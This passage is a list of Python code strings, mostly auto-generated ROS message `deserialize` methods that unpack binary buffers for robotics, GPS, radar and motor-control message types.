[ "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 152\n (_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret,) = _struct_2d2q14dq.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.msg = str[start:end].decode('utf-8')\n else:\n self.msg = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.cmd = str[start:end].decode('utf-8')\n else:\n self.cmd = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.cat = str[start:end].decode('utf-8')\n else:\n self.cat = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.originId, _x.originType, _x.destinationId, _x.destinationType, _x.range, _x.ts, _x.seq, _x.rxPower, _x.channel, _x.datarate, _x.prf, _x.preambleLength, _x.txGain, _x.angle,) = _get_struct_ihih3i3d2i2d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg._Header.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 3\n (_x.gear, _x.front_diff, _x.rear_diff,) = _struct_3B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 8\n (self.i,) = _struct_d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.control is None:\n self.control = vesc_msgs.msg.VescCtrl()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n 
self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.control.mode, _x.control.duty_cycle, _x.control.current, _x.control.brake, _x.control.speed, _x.control.position, _x.control.servo,) = _get_struct_q6d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 1\n (self.result,) = _struct_B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.Header is None:\n self.Header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.Header.seq, _x.Header.stamp.secs, _x.Header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.Header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.Header.frame_id = str[start:end]\n _x = self\n start = end\n end += 11\n (_x.x_pos, _x.y_pos, _x.angle, _x.code_type, _x.code_num,) = _get_struct_2hHBI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.prefixes is None:\n self.prefixes = None\n if self.address is None:\n self.address = knowrob_semantic_map_msgs.msg.SemMapAddress()\n if self.objects is None:\n self.objects = None\n if self.actions is None:\n self.actions = None\n if self.object_properties is None:\n self.object_properties = None\n if self.data_properties is None:\n self.data_properties = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.namespace = str[start:end].decode('utf-8')\n else:\n self.namespace = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.id = str[start:end].decode('utf-8')\n else:\n self.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.prefixes = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapPrefix()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.prefix = str[start:end].decode('utf-8')\n else:\n val1.prefix = str[start:end]\n self.prefixes.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.imports = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n 
val1 = str[start:end]\n self.imports.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.room_nr = str[start:end].decode('utf-8')\n else:\n self.address.room_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.floor_nr = str[start:end].decode('utf-8')\n else:\n self.address.floor_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.street_nr = str[start:end].decode('utf-8')\n else:\n self.address.street_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.street_name = str[start:end].decode('utf-8')\n else:\n self.address.street_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.city_name = str[start:end].decode('utf-8')\n else:\n self.address.city_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.objects = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapObject()\n _v7 = val1.header\n start = end\n end += 4\n (_v7.seq,) = _struct_I.unpack(str[start:end])\n _v8 = _v7.stamp\n _x = _v8\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v7.frame_id = str[start:end].decode('utf-8')\n else:\n _v7.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.type = str[start:end].decode('utf-8')\n else:\n val1.type = str[start:end]\n _v9 = val1.size\n _x = _v9\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n _v10 = val1.pose\n _v11 = _v10.position\n _x = _v11\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v12 = _v10.orientation\n _x = _v12\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.part_of = str[start:end].decode('utf-8')\n else:\n val1.part_of = str[start:end]\n self.objects.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.actions = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapAction()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.type = str[start:end].decode('utf-8')\n else:\n val1.type = str[start:end]\n start = end\n end += 1\n (val1.asserted,) = _struct_B.unpack(str[start:end])\n val1.asserted = bool(val1.asserted)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if 
python3:\n val1.object_acted_on = str[start:end].decode('utf-8')\n else:\n val1.object_acted_on = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.subactions = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8')\n else:\n val2 = str[start:end]\n val1.subactions.append(val2)\n _x = val1\n start = end\n end += 2\n (_x.quantification, _x.unordered,) = _struct_bB.unpack(str[start:end])\n val1.unordered = bool(val1.unordered)\n self.actions.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.object_properties = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapObjectProperty()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.subject = str[start:end].decode('utf-8')\n else:\n val1.subject = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object = str[start:end].decode('utf-8')\n else:\n val1.object = str[start:end]\n self.object_properties.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_properties = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapDataProperty()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.subject = str[start:end].decode('utf-8')\n else:\n val1.subject = str[start:end]\n start = end\n end += 1\n (val1.value_type,) = _struct_B.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.value = str[start:end].decode('utf-8')\n else:\n val1.value = str[start:end]\n self.data_properties.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def _from_cpp(self, str_msg, cls):\n msg = cls()\n result = msg.deserialize(str_msg)\n return result", "def deserialize(self, str):\n try:\n if self.icon is None:\n self.icon = rocon_std_msgs.msg.Icon()\n if self.remappings is None:\n self.remappings = None\n if self.pairing is None:\n self.pairing = rocon_interaction_msgs.msg.Pairing()\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.compatibility = str[start:end].decode('utf-8')\n else:\n self.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.display_name = str[start:end].decode('utf-8')\n else:\n self.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += 
length\n if python3:\n self.description = str[start:end].decode('utf-8')\n else:\n self.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.namespace = str[start:end].decode('utf-8')\n else:\n self.namespace = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.icon.resource_name = str[start:end].decode('utf-8')\n else:\n self.icon.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.icon.format = str[start:end].decode('utf-8')\n else:\n self.icon.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.icon.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.remappings = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.Remapping()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_from = str[start:end].decode('utf-8')\n else:\n val1.remap_from = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_to = str[start:end].decode('utf-8')\n else:\n val1.remap_to = str[start:end]\n self.remappings.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.parameters = str[start:end].decode('utf-8')\n else:\n self.parameters = str[start:end]\n start = end\n end += 4\n (self.max,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.pairing.rapp = str[start:end].decode('utf-8')\n else:\n self.pairing.rapp = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.pairing.remappings = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.Remapping()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_from = str[start:end].decode('utf-8')\n else:\n val1.remap_from = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_to = str[start:end].decode('utf-8')\n else:\n val1.remap_to = str[start:end]\n self.pairing.remappings.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.pairing.parameters = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.key = str[start:end].decode('utf-8')\n else:\n val1.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.value = str[start:end].decode('utf-8')\n else:\n val1.value = str[start:end]\n self.pairing.parameters.append(val1)\n start = end\n end += 4\n (self.hash,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.role = str[start:end].decode('utf-8')\n else:\n self.role = str[start:end]\n return self\n except struct.error as 
e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.battery_voltage,) = _struct_f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.flight_mode_ll = str[start:end].decode('utf-8')\n else:\n self.flight_mode_ll = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_estimation = str[start:end].decode('utf-8')\n else:\n self.state_estimation = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.position_control = str[start:end].decode('utf-8')\n else:\n self.position_control = str[start:end]\n _x = self\n start = end\n end += 10\n (_x.serial_interface_enabled, _x.serial_interface_active, _x.flight_time, _x.cpu_load,) = _struct_2B2f.unpack(str[start:end])\n self.serial_interface_enabled = bool(self.serial_interface_enabled)\n self.serial_interface_active = bool(self.serial_interface_active)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.motor_status = str[start:end].decode('utf-8')\n else:\n self.motor_status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.gps_status = str[start:end].decode('utf-8')\n else:\n self.gps_status = str[start:end]\n _x = self\n start = end\n end += 9\n (_x.gps_num_satellites, _x.have_SSDK_parameters, _x.timesync_offset,) = _struct_iBf.unpack(str[start:end])\n self.have_SSDK_parameters = bool(self.have_SSDK_parameters)\n start = end\n end += 16\n self.rc_channel = _struct_8H.unpack(str[start:end])\n start = end\n end += 12\n self.control_axes = _struct_6H.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.control_buttons = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 48\n (_x.latitude, _x.longitude, _x.altitude, _x.pressure_height, _x.velocity_x, _x.velocity_y,) = _struct_6d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def parse_and_decode(cls, data: bytes) -> \"Message\":\n if len(data) < cls.calc_size() + 1:\n raise NotEnoughData()\n if data[0] != cls.type:\n raise InvalidType()\n\n return cls(*unpack('<' + cls.fmt, data[1:cls.calc_size() + 1]))", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n 
self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.command, _x.set_num, _x.paraset_byte54, _x.paraset_byte53, _x.paraset_byte52, _x.paraset_byte51, _x.paraset_byte50, _x.paraset_byte49, _x.paraset_byte48, _x.paraset_byte47, _x.paraset_byte46, _x.paraset_byte45, _x.paraset_byte44, _x.paraset_byte43, _x.paraset_byte42, _x.paraset_byte41, _x.paraset_byte40, _x.paraset_byte39, _x.paraset_byte38, _x.paraset_byte37, _x.paraset_byte36, _x.paraset_byte35, _x.paraset_byte34, _x.paraset_byte33, _x.paraset_byte32, _x.paraset_byte31, _x.paraset_byte30, _x.paraset_byte29, _x.paraset_byte28, _x.paraset_byte27, _x.paraset_byte26, _x.paraset_byte25, _x.paraset_byte24, _x.paraset_byte23, _x.paraset_byte22, _x.paraset_byte21, _x.paraset_byte20, _x.paraset_byte19, _x.paraset_byte18, _x.paraset_byte17, _x.paraset_byte16, _x.paraset_byte15, _x.paraset_byte14, _x.paraset_byte13, _x.paraset_byte12, _x.paraset_byte11, _x.paraset_byte10, _x.paraset_byte9, _x.paraset_byte8, _x.paraset_byte7, _x.paraset_byte6, _x.paraset_byte5, _x.paraset_byte4, _x.paraset_byte3, _x.paraset_byte2, _x.paraset_byte1,) = _get_struct_56B().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 29\n (_x.status, _x.index, _x.range, _x.range_rate, _x.range_accl, _x.azimuth, _x.lateral_rate, _x.width, _x.is_mr_update, _x.is_lr_update, _x.amplitude,) = _get_struct_2B6f2Bb().unpack(str[start:end])\n self.is_mr_update = bool(self.is_mr_update)\n self.is_lr_update = bool(self.is_lr_update)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.cond_transition is None:\n self.cond_transition = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_path = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.state_path = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_class = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.state_class = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.initial_state_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.initial_state_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.input_keys = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.input_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.output_keys = []\n 
for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.output_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.cond_outcome = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.cond_outcome.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.cond_transition = []\n for i in range(0, length):\n val1 = flexbe_msgs.msg.OutcomeCondition()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.state_name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2 = str[start:end]\n val1.state_name.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.state_outcome = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2 = str[start:end]\n val1.state_outcome.append(val2)\n self.cond_transition.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.behavior_class = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.behavior_class = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.parameter_names = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.parameter_names.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.parameter_values = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.parameter_values.append(val1)\n start = end\n end += 8\n self.position = _get_struct_2f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.outcomes = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.outcomes.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.transitions = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.transitions.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sb'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.autonomy = s.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n 
self.userdata_keys = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.userdata_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.userdata_remapping = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.userdata_remapping.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 1\n (self.success,) = _struct_B.unpack(str[start:end])\n self.success = bool(self.success)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 34\n (_x.sensorId, _x.id, _x.length, _x.width, _x.measstat, _x.existprob, _x.dynprop, _x.latdisp, _x.longdisp, _x.relxdot, _x.relxddot, _x.latspeed, _x.obsprob, _x.rollcount, _x.rcs,) = _struct_H6B5f2Bf.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.sv is None:\n self.sv = None\n end = 0\n _x = self\n start = end\n end += 8\n (_x.rcvTOW, _x.week, _x.numSV, _x.reserved1,) = _get_struct_ih2B().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.sv = []\n for i in range(0, length):\n val1 = ublox_msgs.msg.RxmRAW_SV()\n _x = val1\n start = end\n end += 24\n (_x.cpMes, _x.prMes, _x.doMes, _x.sv, _x.mesQI, _x.cno, _x.lli,) = _get_struct_2dfB2bB().unpack(str[start:end])\n self.sv.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 36\n (_x.mask, _x.dynModel, _x.fixMode, _x.fixedAlt, _x.fixedAltVar, _x.minElev, _x.drLimit, _x.pDop, _x.tDop, _x.pAcc, _x.tAcc, _x.staticHoldThresh, _x.dgpsTimeOut, _x.reserved2, _x.reserved3, _x.reserved4,) = _get_struct_H2BiIbB4H2B3I().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.type is None:\n self.type = std_msgs.msg.String()\n if self.parent_name is None:\n self.parent_name = std_msgs.msg.String()\n if self.name is None:\n self.name = std_msgs.msg.String()\n if self.pose is None:\n self.pose = geometry_msgs.msg.Pose()\n if self.sensed_objects is None:\n self.sensed_objects = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, 
